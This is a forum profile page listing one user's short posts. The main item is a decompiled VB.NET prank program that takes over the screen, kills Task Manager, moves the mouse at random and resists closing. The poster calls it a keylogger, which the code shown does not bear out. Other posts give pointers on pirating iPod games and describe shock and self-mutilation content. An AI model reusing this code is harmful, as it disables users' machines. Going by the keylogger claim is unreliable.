Jump to content

UgLy-NeRd

Members
  • Joined

  1. mb you should study proxy lists bud
  2. http://www.zomgstuff.net/forum/showthread.php?t=1827 Source is right there...
  3. That most definitely does the trick (if you wanted to make your computer not boot up). Try googling before you post nubster. Go in your browser's options and delete it.
  4. rofl had no clue it was a lappertop get it if it is a laptop.
  5. I would say "Build your own"
  6. "Windows XP logo".
  7. lawllerskates scanned it with kaspersky. its clean. ran the app, all it is is lemonparty tubgirl meatspit ect all over ur screen, then it moves ur mouse. stupid as hell.
  8. Then why don't you tell us what it is?
  9. Are you kidding me? This kid didn't even protect his code. I was able to open it with a .NET reflector. It opens up as "joke proj" and is a keylogger. Imports Microsoft.VisualBasic.CompilerServices Imports System Imports System.ComponentModel Imports System.Diagnostics Imports System.Drawing Imports System.Resources Imports System.Runtime.CompilerServices Imports System.Runtime.InteropServices Imports System.Windows.Forms Namespace joke_proj Public Class Form1 Inherits Form ' Methods Public Sub New() AddHandler MyBase.Load, New EventHandler(AddressOf Me.Form1_Load) AddHandler MyBase.Closing, New CancelEventHandler(AddressOf Me.Form1_Closing) Me.InitializeComponent End Sub Protected Overrides Sub Dispose(ByVal disposing As Boolean) If (disposing AndAlso (Not Me.components Is Nothing)) Then Me.components.Dispose End If MyBase.Dispose(disposing) End Sub Private Sub Form1_Closing(ByVal sender As Object, ByVal e As CancelEventArgs) e.Cancel = True End Sub Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Me.Height = Screen.PrimaryScreen.Bounds.Height Me.Width = Screen.PrimaryScreen.Bounds.Width Me.pic.Height = Screen.PrimaryScreen.Bounds.Height Me.pic.Width = Screen.PrimaryScreen.Bounds.Width End Sub <DllImport("user32", CharSet:=CharSet.Ansi, SetLastError:=True, ExactSpelling:=True)> _ Private Shared Function GetAsyncKeyState(ByVal vKey As Long) As Integer <DebuggerStepThrough> _ Private Sub InitializeComponent() Me.components = New Container Dim manager1 As New ResourceManager(GetType(Form1)) Me.Timer1 = New Timer(Me.components) Me.pic = New PictureBox Me.SuspendLayout Me.Timer1.Enabled = True Me.pic.Image = DirectCast(manager1.GetObject("pic.Image"), Bitmap) Me.pic.Name = "pic" Dim size1 As New Size(112, 72) Me.pic.Size = size1 Me.pic.TabIndex = 0 Me.pic.TabStop = False size1 = New Size(5, 13) Me.AutoScaleBaseSize = size1 size1 = New Size(416, 312) Me.ClientSize = size1 Dim controlArray1 As Control() = New Control() { Me.pic } Me.Controls.AddRange(controlArray1) Me.FormBorderStyle = FormBorderStyle.None Me.MinimizeBox = False Me.Name = "Form1" Me.ShowInTaskbar = False Me.StartPosition = FormStartPosition.Manual Me.TopMost = True Me.ResumeLayout(False) End Sub Private Sub killa() Me.myProcesses = Process.GetProcesses Dim processArray1 As Process() = Me.myProcesses Dim num1 As Integer = 0 Do While (num1 < processArray1.Length) Me.myProcess = processArray1(num1) If (StringType.StrCmp(Me.myProcess.ProcessName, "taskmgr", False) = 0) Then Me.myProcess.Kill End If num1 += 1 Loop End Sub <STAThread> _ Public Shared Sub Main() Application.Run(New Form1) End Sub Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs) Me.killa Dim random1 As New Random Dim point1 As Point = Cursor.Position point1.X = (point1.X + random1.Next(-500, 500)) point1.Y = (point1.Y + random1.Next(-500, 500)) Cursor.Position = point1 If ((Form1.GetAsyncKeyState(120) And Form1.GetAsyncKeyState(123)) > 0) Then Application.Exit End If End Sub ' Properties Friend Overridable Property pic As PictureBox Get Return Me._pic End Get Set(ByVal WithEventsValue As PictureBox) If (Not Me._pic Is Nothing) Then End If Me._pic = WithEventsValue If (Not Me._pic Is Nothing) Then End If End Set End Property Friend Overridable Property Timer1 As Timer Get Return Me._Timer1 End Get Set(ByVal WithEventsValue As Timer) If (Not Me._Timer1 Is Nothing) Then RemoveHandler Me._Timer1.Tick, New EventHandler(AddressOf Me.Timer1_Tick) End If Me._Timer1 = WithEventsValue If (Not Me._Timer1 Is Nothing) Then AddHandler Me._Timer1.Tick, New EventHandler(AddressOf Me.Timer1_Tick) End If End Set End Property ' Fields <AccessedThroughProperty("pic")> _ Private _pic As PictureBox <AccessedThroughProperty("Timer1")> _ Private _Timer1 As Timer Private components As IContainer Private myProcess As Process Private myProcesses As Process() End Class End Namespace noob.
  10. UgLy-NeRd posted a post in a topic in General Discussion
    a bad attempt with photoshop? rofl @ cigarette buds in the background i dont like it
  11. UgLy-NeRd posted a post in a topic in General Discussion
    You look like Andy Milanokis...
  12. UgLy-NeRd posted a post in a topic in General Discussion
    nice cake
  13. UgLy-NeRd posted a post in a topic in Computer Discussion
    1) The file extension for an iPod game is .ipg. 2) You can open an iPod game with WinRAR, it is several files compressed together. 3) When you open the iPod game file with WinRAR, the file "iTunesMetaData" contains the account e-mail address. 4) When you open the iPod game file with WinRAR, under the directory "Executables", the .bin.sinf file contains the person's name who purchased the game. 5) The games are stored under the iPod_Control\Games_RO folder on your iPod. 6) The game has to be put under a folder named the hex number of the game. This number can be located in the manifest.plist. Hex numbers for the folders: 12345 - Vortex 33333 - Texas Hold 'Em 44444 - Zuma 55555 - Bejeweled 66666 - Tetris 77777 - Mahjong 88888 - Mini Golf 99999 - Cubis 2 AAAAA - Pac-Man 50513 - Sudoku 50514 - Royal Solitaire In the sinf file, the from offset 472-end of file contains some information (about your iPod/computer?) and a list of games you have purchased prior to when you purchased that game. All that needs to be done to pirate an iPod game (making playable) is decoding the last bit of info in the sinf file. (Offset 472-E.O.F.) Anyone good at decoding?
  14. A guy cutting his balls off with a hatchet and his penis off with a knife. He uses a breadboard in the process.